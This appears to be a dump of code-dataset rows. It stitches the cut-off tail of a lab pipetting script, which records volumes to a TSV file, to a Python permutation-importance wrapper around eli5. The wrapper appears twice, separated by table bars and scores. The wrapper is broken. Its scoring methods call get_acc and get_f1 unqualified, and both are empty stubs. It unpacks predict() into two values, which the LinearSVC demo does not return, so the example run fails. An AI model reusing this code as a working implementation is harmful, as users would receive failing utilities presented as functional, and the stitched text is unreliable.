if i+1 < 7:
df1.at[j+1,'source '+str(curTube+1)] = float(volTip)
else:
df1.at[j+1,'source '+str(curTube+7)] = float(volTip)
if j == validWells - 1:
#pipette.blow_out(curRack.wells()[curTube])
curVol = 0
pipette.drop_tip()
df1.to_csv("output.tsv", sep="\t")
| 0.242564 | 0.275443 |
import numpy as np
import eli5
from eli5.sklearn import PermutationImportance
from eli5.permutation_importance import get_score_importances
class PermutationImportance_(object):
"""
see https://eli5.readthedocs.io/en/latest/blackbox/permutation_importance.html
and see https://www.kaggle.com/dansbecker/permutation-importance
for details
Parameters:
-----------
model: model object that have predict method
feature: ndarray with shape of [n_samples, n_features]
Machine learning features
target: ndarray with shape of [n_samples,]
Machine learning features
Attributes:
--------
weight_: ndarray with shape of [n_features, ]
Feature importance (weight)
"""
def __init__(self, model, feature, target, metric="accuracy"):
self.model = model
self.feature = feature
self.target = target
self.metric = metric
self.metric_dict = {"accuracy": self.score_acc, "f1": self.score_f1} # you should update it
def fit(self):
base_score, score_decreases = get_score_importances(
self.metric_dict[self.metric],
self.feature,
self.target
)
self.weight_ = np.mean(score_decreases, axis=0)
return self
def score_acc(self, feature, target):
"""Get accuracy
"""
y_pred, y_prob = self.model.predict(feature)
accuracy = get_acc(target, y_pred) # you should define get_acc, or you using eslearn.model_evaluator
return accuracy
def score_f1(self, feature, target):
"""Get F1 score
"""
y_pred, y_prob = self.model.predict(feature)
accuracy = get_f1(target, y_pred) # you should define get_f1, or you using eslearn.model_evaluator
return accuracy
@staticmethod
def get_acc(target, y_pred):
pass
@staticmethod
def get_f1(target, y_pred):
pass
if __name__ == "__main__":
from sklearn.svm import LinearSVC
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import make_classification
X, y = make_classification(n_features=4, random_state=0)
model = LinearSVC(random_state=0, tol=1e-5)
model.fit(X, y)
permimp = PermutationImportance_(model, X, y)
permimp.fit()
|
eslearn/utils/permutation_importance.py
|
import numpy as np
import eli5
from eli5.sklearn import PermutationImportance
from eli5.permutation_importance import get_score_importances
class PermutationImportance_(object):
"""
see https://eli5.readthedocs.io/en/latest/blackbox/permutation_importance.html
and see https://www.kaggle.com/dansbecker/permutation-importance
for details
Parameters:
-----------
model: model object that have predict method
feature: ndarray with shape of [n_samples, n_features]
Machine learning features
target: ndarray with shape of [n_samples,]
Machine learning features
Attributes:
--------
weight_: ndarray with shape of [n_features, ]
Feature importance (weight)
"""
def __init__(self, model, feature, target, metric="accuracy"):
self.model = model
self.feature = feature
self.target = target
self.metric = metric
self.metric_dict = {"accuracy": self.score_acc, "f1": self.score_f1} # you should update it
def fit(self):
base_score, score_decreases = get_score_importances(
self.metric_dict[self.metric],
self.feature,
self.target
)
self.weight_ = np.mean(score_decreases, axis=0)
return self
def score_acc(self, feature, target):
"""Get accuracy
"""
y_pred, y_prob = self.model.predict(feature)
accuracy = get_acc(target, y_pred) # you should define get_acc, or you using eslearn.model_evaluator
return accuracy
def score_f1(self, feature, target):
"""Get F1 score
"""
y_pred, y_prob = self.model.predict(feature)
accuracy = get_f1(target, y_pred) # you should define get_f1, or you using eslearn.model_evaluator
return accuracy
@staticmethod
def get_acc(target, y_pred):
pass
@staticmethod
def get_f1(target, y_pred):
pass
if __name__ == "__main__":
from sklearn.svm import LinearSVC
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import make_classification
X, y = make_classification(n_features=4, random_state=0)
model = LinearSVC(random_state=0, tol=1e-5)
model.fit(X, y)
permimp = PermutationImportance_(model, X, y)
permimp.fit()
| 0.839306 | 0.517815 |